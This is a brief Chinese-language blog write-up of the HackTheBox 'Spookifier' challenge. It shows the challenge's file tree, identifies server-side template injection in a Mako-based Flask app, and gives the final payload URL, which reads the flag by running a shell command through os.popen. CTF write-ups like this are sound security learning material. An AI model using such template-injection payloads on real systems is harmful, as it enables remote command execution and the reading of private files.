HackTheBox-Challenges Spookifier Writeup

kazma 成大資安社 創辦人/社長

剛好這幾天在萬聖節應景解到這題XD
首先下面是這題的文件架構:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
╰─ tree .                                              ─╯
.
├── Dockerfile
├── build-docker.sh
├── challenge
│   ├── application
│   │   ├── blueprints
│   │   │   └── routes.py
│   │   ├── main.py
│   │   ├── static
│   │   │   ├── css
│   │   │   │   ├── index.css
│   │   │   │   └── nes.css
│   │   │   └── images
│   │   │   └── vamp.png
│   │   ├── templates
│   │   │   └── index.html
│   │   └── util.py
│   └── run.py
├── config
│   └── supervisord.conf
└── flag.txt

我們逛一下網站還有看一下 main.py 可以看到他是用 python mako 寫的,不過其實我們照著 ssti 的 checklist 測試也可以知道他是用 mako。
知道是 ssti 以後我們就可以撈 flag 了,這邊放上最後的 payload 參考:
http://94.237.63.215:32454/?text=${self.module.runtime.util.os.popen(%22cat%20../flag*%22).read()}

Pwned !!!

pwn

  • Title: HackTheBox-Challenges Spookifier Writeup
  • Author: kazma
  • Created at : 2024-10-31 12:59:04
  • Updated at : 2024-10-31 13:42:37
  • Link: https://kazma.tw/2024/10/31/HackTheBox-Challenges-Spookifier-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
HackTheBox-Challenges Spookifier Writeup